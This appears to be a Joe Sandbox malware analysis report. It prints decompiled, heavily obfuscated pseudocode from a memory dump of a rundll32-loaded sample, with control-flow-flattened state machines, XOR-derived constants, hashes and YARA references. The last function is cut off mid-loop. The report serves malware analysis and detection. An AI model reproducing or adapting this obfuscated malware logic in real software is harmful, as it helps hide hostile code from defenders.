				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002DDA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E002CB6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E002C8969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E002C47CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E002DDCF7(_v2620, 0x2c1308, _t515),  &_v1560, _v2720, _v2688);
							E002CA8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E002CEA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E002D46BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E002C47CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E002DDCF7(_v2708, 0x2c1348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E002CA8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E002CAB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}



































































                                                                                                                                    0x002cf09b
                                                                                                                                    0x002cf0a1
                                                                                                                                    0x002cf0ae
                                                                                                                                    0x002cf0b6
                                                                                                                                    0x002cf0c1
                                                                                                                                    0x002cf0c9
                                                                                                                                    0x002cf0d1
                                                                                                                                    0x002cf0d9
                                                                                                                                    0x002cf0e1
                                                                                                                                    0x002cf0e9
                                                                                                                                    0x002cf0fa
                                                                                                                                    0x002cf0fc
                                                                                                                                    0x002cf101
                                                                                                                                    0x002cf106
                                                                                                                                    0x002cf110
                                                                                                                                    0x002cf115
                                                                                                                                    0x002cf11b
                                                                                                                                    0x002cf123
                                                                                                                                    0x002cf136
                                                                                                                                    0x002cf139
                                                                                                                                    0x002cf140
                                                                                                                                    0x002cf14b
                                                                                                                                    0x002cf153
                                                                                                                                    0x002cf160
                                                                                                                                    0x002cf164
                                                                                                                                    0x002cf16c
                                                                                                                                    0x002cf174
                                                                                                                                    0x002cf179
                                                                                                                                    0x002cf185
                                                                                                                                    0x002cf18a
                                                                                                                                    0x002cf190
                                                                                                                                    0x002cf198
                                                                                                                                    0x002cf1a4
                                                                                                                                    0x002cf1a9
                                                                                                                                    0x002cf1af
                                                                                                                                    0x002cf1b4
                                                                                                                                    0x002cf1bc
                                                                                                                                    0x002cf1c4
                                                                                                                                    0x002cf1cc
                                                                                                                                    0x002cf1d4
                                                                                                                                    0x002cf1dc
                                                                                                                                    0x002cf1e7
                                                                                                                                    0x002cf1f2
                                                                                                                                    0x002cf1fd
                                                                                                                                    0x002cf205
                                                                                                                                    0x002cf20a
                                                                                                                                    0x002cf213
                                                                                                                                    0x002cf216
                                                                                                                                    0x002cf21a
                                                                                                                                    0x002cf222
                                                                                                                                    0x002cf22a
                                                                                                                                    0x002cf234
                                                                                                                                    0x002cf238
                                                                                                                                    0x002cf240
                                                                                                                                    0x002cf24d
                                                                                                                                    0x002cf258
                                                                                                                                    0x002cf263
                                                                                                                                    0x002cf26b
                                                                                                                                    0x002cf276
                                                                                                                                    0x002cf27b
                                                                                                                                    0x002cf281
                                                                                                                                    0x002cf289
                                                                                                                                    0x002cf291
                                                                                                                                    0x002cf29c
                                                                                                                                    0x002cf2a7
                                                                                                                                    0x002cf2b2
                                                                                                                                    0x002cf2ba
                                                                                                                                    0x002cf2bf
                                                                                                                                    0x002cf2c7
                                                                                                                                    0x002cf2d4
                                                                                                                                    0x002cf2d7
                                                                                                                                    0x002cf2db
                                                                                                                                    0x002cf2e8
                                                                                                                                    0x002cf2ec
                                                                                                                                    0x002cf2f4
                                                                                                                                    0x002cf307
                                                                                                                                    0x002cf30e
                                                                                                                                    0x002cf319
                                                                                                                                    0x002cf321
                                                                                                                                    0x002cf326
                                                                                                                                    0x002cf32e
                                                                                                                                    0x002cf336
                                                                                                                                    0x002cf346
                                                                                                                                    0x002cf34a
                                                                                                                                    0x002cf34f
                                                                                                                                    0x002cf357
                                                                                                                                    0x002cf369
                                                                                                                                    0x002cf36e
                                                                                                                                    0x002cf377
                                                                                                                                    0x002cf382
                                                                                                                                    0x002cf38d
                                                                                                                                    0x002cf398
                                                                                                                                    0x002cf3a3
                                                                                                                                    0x002cf3af
                                                                                                                                    0x002cf3b4
                                                                                                                                    0x002cf3ba
                                                                                                                                    0x002cf3c2
                                                                                                                                    0x002cf3ca
                                                                                                                                    0x002cf3d2
                                                                                                                                    0x002cf3dd
                                                                                                                                    0x002cf3e8
                                                                                                                                    0x002cf3f3
                                                                                                                                    0x002cf3fb
                                                                                                                                    0x002cf408
                                                                                                                                    0x002cf409
                                                                                                                                    0x002cf40d
                                                                                                                                    0x002cf415
                                                                                                                                    0x002cf41d
                                                                                                                                    0x002cf42b
                                                                                                                                    0x002cf42f
                                                                                                                                    0x002cf437
                                                                                                                                    0x002cf43e
                                                                                                                                    0x002cf44b
                                                                                                                                    0x002cf453
                                                                                                                                    0x002cf458
                                                                                                                                    0x002cf460
                                                                                                                                    0x002cf468
                                                                                                                                    0x002cf470
                                                                                                                                    0x002cf478
                                                                                                                                    0x002cf480
                                                                                                                                    0x002cf488
                                                                                                                                    0x002cf490
                                                                                                                                    0x002cf498
                                                                                                                                    0x002cf4a0
                                                                                                                                    0x002cf4a8
                                                                                                                                    0x002cf4b0
                                                                                                                                    0x002cf4b8
                                                                                                                                    0x002cf4c3
                                                                                                                                    0x002cf4ce
                                                                                                                                    0x002cf4d9
                                                                                                                                    0x002cf4e1
                                                                                                                                    0x002cf4e6
                                                                                                                                    0x002cf4ee
                                                                                                                                    0x002cf4f6
                                                                                                                                    0x002cf4fe
                                                                                                                                    0x002cf50c
                                                                                                                                    0x002cf50f
                                                                                                                                    0x002cf513
                                                                                                                                    0x002cf51b
                                                                                                                                    0x002cf523
                                                                                                                                    0x002cf52b
                                                                                                                                    0x002cf530
                                                                                                                                    0x002cf538
                                                                                                                                    0x002cf543
                                                                                                                                    0x002cf54b
                                                                                                                                    0x002cf556
                                                                                                                                    0x002cf561
                                                                                                                                    0x002cf569
                                                                                                                                    0x002cf574
                                                                                                                                    0x002cf587
                                                                                                                                    0x002cf58e
                                                                                                                                    0x002cf599
                                                                                                                                    0x002cf5a1
                                                                                                                                    0x002cf5a6
                                                                                                                                    0x002cf5ae
                                                                                                                                    0x002cf5b6
                                                                                                                                    0x002cf5c3
                                                                                                                                    0x002cf5c7
                                                                                                                                    0x002cf5cf
                                                                                                                                    0x002cf5d7
                                                                                                                                    0x002cf5df
                                                                                                                                    0x002cf5e7
                                                                                                                                    0x002cf5ef
                                                                                                                                    0x002cf5f7
                                                                                                                                    0x002cf602
                                                                                                                                    0x002cf60a
                                                                                                                                    0x002cf611
                                                                                                                                    0x002cf61c
                                                                                                                                    0x002cf624
                                                                                                                                    0x002cf62c
                                                                                                                                    0x002cf630
                                                                                                                                    0x002cf638
                                                                                                                                    0x002cf640
                                                                                                                                    0x002cf648
                                                                                                                                    0x002cf650
                                                                                                                                    0x002cf658
                                                                                                                                    0x002cf663
                                                                                                                                    0x002cf66b
                                                                                                                                    0x002cf676
                                                                                                                                    0x002cf67e
                                                                                                                                    0x002cf686
                                                                                                                                    0x002cf68e
                                                                                                                                    0x002cf696
                                                                                                                                    0x002cf6a4
                                                                                                                                    0x002cf7b0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cf6aa
                                                                                                                                    0x002cf6aa
                                                                                                                                    0x002cf6b0
                                                                                                                                    0x002cf883
                                                                                                                                    0x002cf883
                                                                                                                                    0x002cf889
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cf6b6
                                                                                                                                    0x002cf6d2
                                                                                                                                    0x002cf700
                                                                                                                                    0x002cf70a
                                                                                                                                    0x002cf70f
                                                                                                                                    0x002cf71b
                                                                                                                                    0x002cf762
                                                                                                                                    0x002cf777
                                                                                                                                    0x002cf795
                                                                                                                                    0x002cf799
                                                                                                                                    0x002cf79e
                                                                                                                                    0x002cf7a3
                                                                                                                                    0x002cf7a9
                                                                                                                                    0x00000000
                                                                                                                                    0x002cf7a9
                                                                                                                                    0x002cf7a3
                                                                                                                                    0x002cf6b0
                                                                                                                                    0x002cf898
                                                                                                                                    0x002cf898
                                                                                                                                    0x002cf7ba
                                                                                                                                    0x002cf7c8
                                                                                                                                    0x002cf7cf
                                                                                                                                    0x002cf7de
                                                                                                                                    0x002cf7df
                                                                                                                                    0x002cf7e4
                                                                                                                                    0x002cf7f0
                                                                                                                                    0x002cf837
                                                                                                                                    0x002cf843
                                                                                                                                    0x002cf849
                                                                                                                                    0x002cf858
                                                                                                                                    0x002cf85c
                                                                                                                                    0x002cf85e
                                                                                                                                    0x002cf85f
                                                                                                                                    0x002cf861
                                                                                                                                    0x002cf863
                                                                                                                                    0x002cf86e
                                                                                                                                    0x002cf875
                                                                                                                                    0x002cf876
                                                                                                                                    0x002cf87b
                                                                                                                                    0x002cf87e
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: kD$)$5$<!$Q0
                                                                                                                                    • API String ID: 0-101729813
                                                                                                                                    • Opcode ID: 2742533812d26a4fe58e0ad0e09691088bdcb8eb1d6d7f36b104c671aaac52e7
                                                                                                                                    • Instruction ID: c4a96a04b5c36f0a2f97fe2fcedf9214b574d22314f036f9ebd0eb5d28d37870
                                                                                                                                    • Opcode Fuzzy Hash: 2742533812d26a4fe58e0ad0e09691088bdcb8eb1d6d7f36b104c671aaac52e7
                                                                                                                                    • Instruction Fuzzy Hash: 581211715183809FD3A8CF21C48AA4BFBE2FBC5718F508A1DE5D986260D7B58959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D66CA Relevance: 6.5, Strings: 5, Instructions: 240COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002D66CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E002D5C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E002DDCF7(_v1084, 0x2c1060, __eflags);
							_t264 = E002DD25E(_v1120);
							_t282 =  *0x2e3e10; // 0x0
							_t265 =  *0x2e3e10; // 0x0
							E002D453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E002CA8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E002DDCF7(_v1136, 0x2c1000, _t319);
									_t289 =  *0x2e3e10; // 0x0
									_t306 =  *0x2e3e10; // 0x0
									E002C47CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E002CA8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E002E13AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                                    0x002d66ca
                                                                                                                                    0x002d66d0
                                                                                                                                    0x002d66d7
                                                                                                                                    0x002d66df
                                                                                                                                    0x002d66e7
                                                                                                                                    0x002d66ef
                                                                                                                                    0x002d66f7
                                                                                                                                    0x002d66ff
                                                                                                                                    0x002d6711
                                                                                                                                    0x002d6716
                                                                                                                                    0x002d671c
                                                                                                                                    0x002d6724
                                                                                                                                    0x002d6729
                                                                                                                                    0x002d6731
                                                                                                                                    0x002d6736
                                                                                                                                    0x002d673e
                                                                                                                                    0x002d674b
                                                                                                                                    0x002d674c
                                                                                                                                    0x002d6750
                                                                                                                                    0x002d6758
                                                                                                                                    0x002d6760
                                                                                                                                    0x002d6768
                                                                                                                                    0x002d6770
                                                                                                                                    0x002d6778
                                                                                                                                    0x002d6780
                                                                                                                                    0x002d6788
                                                                                                                                    0x002d6790
                                                                                                                                    0x002d6798
                                                                                                                                    0x002d67a0
                                                                                                                                    0x002d67a8
                                                                                                                                    0x002d67b0
                                                                                                                                    0x002d67b8
                                                                                                                                    0x002d67c0
                                                                                                                                    0x002d67c8
                                                                                                                                    0x002d67d0
                                                                                                                                    0x002d67d8
                                                                                                                                    0x002d67e0
                                                                                                                                    0x002d67e8
                                                                                                                                    0x002d67ed
                                                                                                                                    0x002d67f2
                                                                                                                                    0x002d67f7
                                                                                                                                    0x002d67ff
                                                                                                                                    0x002d6807
                                                                                                                                    0x002d680f
                                                                                                                                    0x002d6814
                                                                                                                                    0x002d681c
                                                                                                                                    0x002d6824
                                                                                                                                    0x002d682c
                                                                                                                                    0x002d6834
                                                                                                                                    0x002d683c
                                                                                                                                    0x002d6844
                                                                                                                                    0x002d6851
                                                                                                                                    0x002d6855
                                                                                                                                    0x002d685a
                                                                                                                                    0x002d6862
                                                                                                                                    0x002d686a
                                                                                                                                    0x002d6872
                                                                                                                                    0x002d687a
                                                                                                                                    0x002d6888
                                                                                                                                    0x002d688c
                                                                                                                                    0x002d6894
                                                                                                                                    0x002d689c
                                                                                                                                    0x002d68a4
                                                                                                                                    0x002d68ac
                                                                                                                                    0x002d68b4
                                                                                                                                    0x002d68bc
                                                                                                                                    0x002d68c4
                                                                                                                                    0x002d68c9
                                                                                                                                    0x002d68ce
                                                                                                                                    0x002d68d8
                                                                                                                                    0x002d68e0
                                                                                                                                    0x002d68e8
                                                                                                                                    0x002d68ed
                                                                                                                                    0x002d68f2
                                                                                                                                    0x002d68fa
                                                                                                                                    0x002d6902
                                                                                                                                    0x002d690a
                                                                                                                                    0x002d6912
                                                                                                                                    0x002d691a
                                                                                                                                    0x002d6922
                                                                                                                                    0x002d692a
                                                                                                                                    0x002d6932
                                                                                                                                    0x002d693a
                                                                                                                                    0x002d6942
                                                                                                                                    0x002d694a
                                                                                                                                    0x002d6952
                                                                                                                                    0x002d695a
                                                                                                                                    0x002d6962
                                                                                                                                    0x002d6967
                                                                                                                                    0x002d696f
                                                                                                                                    0x002d6977
                                                                                                                                    0x002d6986
                                                                                                                                    0x002d6989
                                                                                                                                    0x002d698d
                                                                                                                                    0x002d6995
                                                                                                                                    0x002d699d
                                                                                                                                    0x002d69a5
                                                                                                                                    0x002d69ad
                                                                                                                                    0x002d69b5
                                                                                                                                    0x002d69ba
                                                                                                                                    0x002d69bf
                                                                                                                                    0x002d69c7
                                                                                                                                    0x002d69d7
                                                                                                                                    0x002d69db
                                                                                                                                    0x002d69e3
                                                                                                                                    0x002d69eb
                                                                                                                                    0x002d69f3
                                                                                                                                    0x002d69fb
                                                                                                                                    0x002d6a08
                                                                                                                                    0x002d6a09
                                                                                                                                    0x002d6a0d
                                                                                                                                    0x002d6a15
                                                                                                                                    0x002d6a22
                                                                                                                                    0x002d6a26
                                                                                                                                    0x002d6a2e
                                                                                                                                    0x002d6a36
                                                                                                                                    0x002d6a3e
                                                                                                                                    0x002d6a4c
                                                                                                                                    0x002d6a50
                                                                                                                                    0x002d6a60
                                                                                                                                    0x002d6a74
                                                                                                                                    0x002d6a74
                                                                                                                                    0x002d6a82
                                                                                                                                    0x002d6b0d
                                                                                                                                    0x002d6b16
                                                                                                                                    0x002d6b1e
                                                                                                                                    0x002d6b2f
                                                                                                                                    0x002d6b34
                                                                                                                                    0x002d6b47
                                                                                                                                    0x002d6b6a
                                                                                                                                    0x002d6b7c
                                                                                                                                    0x002d6b81
                                                                                                                                    0x002d6b84
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a88
                                                                                                                                    0x002d6a8e
                                                                                                                                    0x002d6b06
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a90
                                                                                                                                    0x002d6a90
                                                                                                                                    0x002d6a92
                                                                                                                                    0x002d6a98
                                                                                                                                    0x002d6aa1
                                                                                                                                    0x002d6aa9
                                                                                                                                    0x002d6aba
                                                                                                                                    0x002d6ad2
                                                                                                                                    0x002d6ae5
                                                                                                                                    0x002d6af7
                                                                                                                                    0x002d6afc
                                                                                                                                    0x002d6aff
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6aff
                                                                                                                                    0x002d6a92
                                                                                                                                    0x002d6a8e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d6a82
                                                                                                                                    0x002d6b8e
                                                                                                                                    0x002d6b99
                                                                                                                                    0x002d6b9a
                                                                                                                                    0x002d6ba9
                                                                                                                                    0x002d6bae
                                                                                                                                    0x002d6bb1
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bb3
                                                                                                                                    0x002d6bc5

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <E$?c3$Md$a@$yw
                                                                                                                                    • API String ID: 0-2084988834
                                                                                                                                    • Opcode ID: d139282b45ec784bc5d7cfacab5b853ba4f993fbc7fee41e4338e252ee77569d
                                                                                                                                    • Instruction ID: 0f3ce89e2d322c30cf210fd45c4099a9f165d203072169ee21cc95a3460f19c6
                                                                                                                                    • Opcode Fuzzy Hash: d139282b45ec784bc5d7cfacab5b853ba4f993fbc7fee41e4338e252ee77569d
                                                                                                                                    • Instruction Fuzzy Hash: EFC110724083809FD368CF25D58A81BBBF2FB94758F108A1DF5E696260D3B58A09CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D0001 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002D0001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
